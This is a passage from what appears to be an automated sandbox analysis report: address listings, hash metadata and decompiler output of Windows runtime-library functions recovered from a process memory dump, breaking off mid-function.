0x01b62966
0x01b6296c
0x01b62971
0x01b62974
0x01b62980
0x01b62981
0x01b62982
0x01b62983
0x01b62984
0x01b62985
0x01b62986
0x01b62987
0x01b62988
0x01b62989
0x01b6298a
0x01b6298b
0x01b6298c
0x01b6298d
0x01b6298e
0x01b6298f
0x01b62990
0x01b62992
0x01b62997
0x01b629a3
0x01b629a6
0x01b629ab
0x01b629ad
0x01b629b0
0x01b629b2
0x01ba5c80
0x01b629b8
0x01b629b8
0x01b629bb
0x01b629c0
0x01b629c5
0x01b629c6
0x01b629c6
0x01b629c9
0x01b629cb
0x00000000
0x00000000
0x01b629cd
0x01b629d0
0x01b629d9
0x01b629db
0x01b629dd
0x01b62a7f
0x01b62a84
0x01b62a87
0x01b62a89
0x01ba5ca1
0x01ba5ca3
0x00000000
0x01b62a8f
0x01b62a8f
0x00000000
0x01b62a8f
0x00000000
0x01b629e3
0x01b629e3
0x01b629e3
0x00000000
0x01b629e3
0x01b629dd
0x00000000
0x01b629db
0x01b629e6
0x01b629e9
0x01b629eb
0x01b629ed
0x01b629f3
0x01b629f5
0x01b629f8
0x01b629fa
0x01b62a97
0x01b62a9a
0x01b62a9d
0x01b62add
0x00000000
0x01b62a9f
0x01b62aa2
0x01b62aa5
0x01b62aa8
0x01b62aab
0x01ba5cab
0x01ba5caf
0x01ba5cc5
0x01ba5cda
0x01ba5cdc
0x01ba5cdf
0x01ba5ce5
0x00000000
0x01ba5ceb
0x01ba5ced
0x01ba5cee
0x00000000
0x01ba5cee
0x01ba5cb1
0x01ba5cb4
0x01ba5cb9
0x01ba5cbb
0x00000000
0x01ba5cbd
0x01ba5cbd
0x00000000
0x01ba5cbd
0x01ba5cbb
0x01b62ab1
0x01b62ab1
0x01b62ac4
0x01b62ac6
0x01b62ac6
0x00000000
0x01b62ac6
0x01b62aab
0x00000000
0x01b62a00
0x01b62a09
0x01b62a0e
0x01b62a21
0x01b62a24
0x01b62a35
0x01b62a3a
0x01b62a3d
0x01b62a42
0x01b62a59
0x01b62a59
0x01b62a5c
0x01b62a5f
0x01b62a5f
0x01b629fa
0x01b629f3
0x01b62a64
0x01b62a64
0x01b62a6b
0x01b62a6b
0x01b62a6d
0x01b62a72
0x01b62a72
0x00000000

Strings

PATH, xrefs: 01B62642, 01B62691

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 65530bd3841cb441576aa4c291239b767fcc25beb1ae5adcf8acb75bbd6b3cfd
Instruction ID: c96c04e6d75eedbd69c6c50d77fe678bdb4fdef14d9fa7d7c1fe9c0ee4edbf26
Opcode Fuzzy Hash: 65530bd3841cb441576aa4c291239b767fcc25beb1ae5adcf8acb75bbd6b3cfd
Instruction Fuzzy Hash: 1AC18F71E10219DFEB29DF99D881BBDBBB5FF68700F4441A9E901AB250D738AD41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01B6FAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01B6FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E01B4EEF0(0x1c27b60);
					_t134 =  *0x1c27b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1c27b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1c27b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01B46D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E01B476E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01BD8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E01B3B150();
													}
													_t116 = E01BD6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E01B475CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1c28638; // 0x0
																	_t122 = L01B438A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E01B476E2(_t154);
																			goto L41;
																		}
																	} else {
																		E01B476E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L01B6FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L01B470F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E01B6FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E01B6FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E01B6FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E01B6FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E01B6FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1c27b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1c27b84 = _t75;
						_t73 = E01B4EB70(_t134, 0x1c27b60);
						if( *0x1c27b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E01B4FF60( *0x1c27b20);
							}
						}
						goto L5;
					}
				}
			}

0x01b6fab0
0x01b6fab2
0x01b6fab3
0x01b6fab4
0x01b6fabc
0x01b6fac0
0x01b6fb14
0x01b6fb17
0x01b6fac2
0x01b6fac8
0x01b6facd
0x01b6fad3
0x01b6fad3
0x01b6fadd
0x01b6fb18
0x01b6fb1b
0x01b6fb1d
0x01b6fb1e
0x01b6fb1f
0x01b6fb20
0x01b6fb21
0x01b6fb22
0x01b6fb23
0x01b6fb24
0x01b6fb25
0x01b6fb26
0x01b6fb27
0x01b6fb28
0x01b6fb29
0x01b6fb2a
0x01b6fb2b
0x01b6fb2c
0x01b6fb2d
0x01b6fb2e
0x01b6fb2f
0x01b6fb3a
0x01b6fb3b
0x01b6fb3e
0x01b6fb41
0x01b6fb44
0x01b6fb47
0x01b6fb4a
0x01b6fb4d
0x01b6fb53
0x01babdcb
0x01babdcb
0x01b6fb59
0x01b6fb5b
0x01b6fb5b
0x01b6fb5e
0x01babdd5
0x01babdd8
0x00000000
0x01babdda
0x00000000
0x01babdda
0x01b6fb64
0x01b6fb64
0x01b6fb64
0x01b6fb67
0x01b6fb6e
0x01b6fb70
0x01b6fb72
0x00000000
0x01b6fb78
0x01b6fb7a
0x01b6fb7a
0x01b6fb7d
0x01b6fb80
0x01babddf
0x01babde1
0x00000000
0x01babde3
0x00000000
0x01babde3
0x01b6fb86
0x01b6fb86
0x01b6fb86
0x01b6fb8b
0x01b6fb90
0x01b6fb92
0x01b6fb94
0x01b6fb9a
0x01b6fb9b
0x01b6fba1
0x01babde8
0x01babdeb
0x01babded
0x01babeb5
0x01babeb5
0x01babebb
0x01babebd
0x01babec3
0x01babed2
0x01babedd
0x01babedd
0x01babeed
0x00000000
0x01babdf3
0x01babdfe
0x01babe06
0x01babe0b
0x01babe0d
0x01babe0f
0x01babe14
0x01babe19
0x01babe20
0x01babe25
0x01babe27
0x01babe35
0x01babe39
0x01babe46
0x01babe4f
0x01babe54
0x01babe56
0x01babef8
0x01babef8
0x00000000
0x01babe5c
0x01babe5c
0x01babe60
0x00000000
0x01babe66
0x01babe66
0x01babe7f
0x01babe84
0x01babe87
0x01babe89
0x01babe8b
0x01babe99
0x01babe9d
0x01babea0
0x01babeac
0x01babeaf
0x01babeb1
0x01babeb3
0x01babeb3
0x00000000
0x01babea2
0x01babea2
0x00000000
0x01babea2
0x01babe8d
0x01babe8d
0x01babe92
0x00000000
0x01babe92
0x01babe8b
0x01babe60
0x01babe3b
0x01babe3b
0x01babe3e
0x00000000
0x01babe40
0x01babe40
0x01babe44
0x00000000
0x00000000
0x00000000
0x00000000
0x01babe44
0x01babe3e
0x01babe29
0x01babe29
0x00000000
0x01babe29
0x01babe27
0x00000000
0x01b6fba7
0x01b6fba7
0x01b6fbab
0x01babf02
0x01b6fbb1
0x01b6fbb1
0x01b6fbb8
0x01b6fbbd
0x01b6fbbd
0x01b6fbbf
0x01b6fbbf
0x01b6fbc5
0x01b6fbcb
0x01b6fbf8
0x01b6fbf8
0x01b6fbfa
0x00000000
0x01b6fc00
0x01b6fc00
0x01b6fc03
0x00000000
0x01b6fc09
0x01b6fc09
0x01b6fc0f
0x01b6fc15
0x01b6fc23
0x01b6fc23
0x01b6fc25
0x01b6fc27
0x01b6fc75
0x01b6fc7c
0x01b6fc84
0x00000000
0x01b6fc29
0x01b6fc29
0x01b6fc2d
0x01b6fc30
0x01babf0f
0x00000000
0x01b6fc36
0x01b6fc38
0x01b6fc3b
0x01b6fc41
0x01babf17
0x01babf19
0x01babf48
0x01babf4b
0x00000000
0x01babf1b
0x01babf22
0x01babf24
0x01babf26
0x00000000
0x01babf2c
0x01babf37
0x01babf39
0x01babf3b
0x00000000
0x01babf41
0x01babf41
0x01babf41
0x01babf41
0x01babf45
0x00000000
0x01babf45
0x01babf3b
0x01babf26
0x00000000
0x01b6fc47
0x01b6fc47
0x01b6fc49
0x01b6fcb2
0x01b6fcb4
0x01b6fcb6
0x01b6fcdc
0x01b6fcdc
0x00000000
0x01b6fcb8
0x01b6fcc3
0x01b6fcc5
0x01b6fcc7
0x00000000
0x01b6fcc9
0x01b6fcc9
0x01b6fccd
0x00000000
0x01b6fccd
0x01b6fcc7
0x00000000
0x01b6fc4b
0x01b6fc4b
0x01b6fc4e
0x01b6fc4e
0x01b6fc51
0x01b6fc51
0x01b6fc54
0x01b6fc5a
0x01b6fc5c
0x01b6fc5f
0x01b6fc61
0x01b6fc63
0x01b6fc65
0x01b6fc67
0x01b6fc6e
0x01b6fc72
0x01b6fc72
0x01b6fc72
0x01b6fc72
0x01b6fc67
0x01b6fc61
0x00000000
0x01b6fc5a
0x01b6fc49
0x01b6fc41
0x01b6fc30
0x01b6fc27
0x01b6fc03
0x01b6fbcd
0x01b6fbd3
0x01b6fbd9
0x01b6fbdc
0x01b6fbde
0x01b6fc99
0x01b6fc9b
0x01b6fc9d
0x01b6fcd5
0x01b6fcd5
0x01b6fc89
0x01b6fc89
0x00000000
0x01b6fc9f
0x01b6fc9f
0x01b6fca3
0x00000000
0x01b6fca3
0x00000000
0x01b6fbe4
0x01b6fbe4
0x01b6fbe4
0x01b6fbe4
0x01b6fbe9
0x01b6fbf2
0x00000000
0x01b6fbf2
0x01b6fbde
0x01b6fbcb
0x01b6fbab
0x01b6fc8b
0x01b6fc8b
0x01b6fc8c
0x01b6fb80
0x01b6fb72
0x01b6fb5e
0x01b6fc8d
0x01b6fc91
0x01b6fadf
0x01b6fadf
0x01b6fae1
0x01b6fae4
0x01b6fae7
0x01b6faec
0x01b6faf8
0x01b6fb00
0x01b6fb07
0x01b6fb0f
0x01b6fb0f
0x01b6fb07
0x00000000
0x01b6faf8
0x01b6fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 01BABE0F

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 0a6dbc8b7a2723ae43f19d6bb2d513a964c9495c11fbaf0b9f737634ac141c99
Instruction ID: 1e8bfbfeed952a9f03e4fa349f6c9dcbd994aaa983b28baa8e3af20c8d0d15fc
Opcode Fuzzy Hash: 0a6dbc8b7a2723ae43f19d6bb2d513a964c9495c11fbaf0b9f737634ac141c99
Instruction Fuzzy Hash: 5BA1F471A006069BEB2DDF6CD46077AB7A9FF64710F0446EDEA56DB684DB38D801CB80

Uniqueness

Uniqueness Score: -1.00%

Function 01B32D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01B32D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1c25350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1c27bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E01B797C0();
				}
				if( *0x1c279c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x1c279c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01B61624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01B57D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E01BCFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01B79520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E01B6E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L01B8DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1c26901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1c26901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01B79980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E01B795D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01B57D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01B57D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01BB7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E01BCFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1c25350;
							if(_t109 != 0x1c25350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E01BCFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01BC5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x01b32d8a
0x01b32d8a
0x01b32d92
0x01b32d96
0x01b32d9e
0x01b32da0
0x01b32da3
0x01b32da5
0x01b32da8
0x01b32dab
0x01b32db2
0x01b8f9aa
0x01b8f9ab
0x01b8f9ae
0x01b8f9ae
0x01b32db8
0x01b32dc2
0x01b8f9b9
0x01b8f9be
0x01b8f9bf
0x01b8f9bf
0x01b32dcf
0x01b8f9c9
0x01b32dd5
0x01b32dd5
0x01b32dd5
0x01b32dde
0x01b32de1
0x01b32e70
0x01b32e72
0x01b32e72
0x01b32de7
0x01b32deb
0x01b32e7c
0x01b32e83
0x01b32e85
0x01b32e8b
0x01b32e8d
0x01b32e92
0x01b32e92
0x01b32e85
0x01b32df1
0x01b32df7
0x01b32df9
0x01b32df9
0x01b32dfc
0x01b32dff
0x01b32e02
0x00000000
0x01b32e05
0x01b32e0c
0x01b8f9d9
0x01b32e12
0x01b32e12
0x01b32e12
0x01b32e1a
0x01b8f9e3
0x01b8f9e9
0x01b8f9f0
0x01b8f9f6
0x01b8f9f8
0x01b8f9f8
0x01b8f9f0
0x01b32e23
0x01b8fa02
0x01b8fa03
0x01b8fa05
0x01b8fa06
0x00000000
0x01b32e29
0x01b32e29
0x01b32e2e
0x01b32e34
0x01b32e3e
0x00000000
0x00000000
0x01b32e44
0x01b32e47
0x01b32e4d
0x00000000
0x00000000
0x01b32e4f
0x01b32e54
0x00000000
0x00000000
0x01b32e5a
0x01b32e5f
0x01b32e9a
0x01b32ea4
0x01b32ea5
0x01b32ea8
0x01b32eaf
0x01b32eb2
0x01b32eb5
0x01b8fae9
0x01b8faeb
0x01b8faed
0x01b8faef
0x01b8faf7
0x01b8faf8
0x01b8fafd
0x01b8faff
0x01b8fb04
0x01b8fb04
0x01b8faff
0x01b32ec0
0x01b32ec4
0x01b32ec6
0x01b32ec8
0x01b8fb14
0x01b8fb18
0x01b8fb1e
0x01b8fb21
0x01b8fb21
0x01b32ece
0x01b32ece
0x01b32ece
0x01b32ed7
0x01b32e61
0x01b32e63
0x01b8fa6b
0x01b8fa71
0x01b8fa76
0x01b8fa78
0x01b8fa8a
0x01b8fa7a
0x01b8fa83
0x01b8fa83
0x01b8fa8f
0x01b8fa91
0x01b8fa97
0x01b8fa9d
0x01b8faa4
0x01b8faaa
0x01b8faaf
0x01b8fab1
0x01b8fac3
0x01b8fab3
0x01b8fabc
0x01b8fabc
0x01b8fac8
0x01b8facb
0x01b8fadf
0x01b8fadf
0x01b8facb
0x01b8faa4
0x01b8fa91
0x01b32e6f
0x01b32e6f
0x01b32e5f
0x01b8fa13
0x01b8fa15
0x01b8fa17
0x01b8fa1f
0x01b8fa21
0x01b8fa22
0x01b8fa25
0x01b8fa28
0x01b8fa2f
0x01b8fa2f
0x01b8fa2a
0x01b8fa2a
0x01b8fa2a
0x01b8fa31
0x01b8fa34
0x01b8fa36
0x01b8fa3c
0x01b8fa3e
0x01b8fa41
0x01b8fa43
0x01b8fa45
0x01b8fa45
0x01b8fa41
0x01b8fa3c
0x01b8fa4a
0x01b8fa4f
0x01b8fa51
0x01b8fa53
0x01b8fa56
0x01b8fa5b
0x01b8fa5e
0x00000000
0x01b8fa5e
0x01b32e23

Strings

RTL: Re-Waiting, xrefs: 01B8FA4A

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 0493953c8f5637dc1a9263c513a8f063a1183d65837b4024657300810805e5e1
Instruction ID: b0f11bb600d8a526d4a02a87a19edeb4ca8a8ec9caf3bb7f7516e346c3474cbf
Opcode Fuzzy Hash: 0493953c8f5637dc1a9263c513a8f063a1183d65837b4024657300810805e5e1
Instruction Fuzzy Hash: F7612571A00655AFDB3AEF6CC885B7EBBB5EB84B20F1402EDD911972C1CB749940C791

Uniqueness

Uniqueness Score: -1.00%

Function 01C00EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01C00EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E01BFFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01C01074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01B79730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
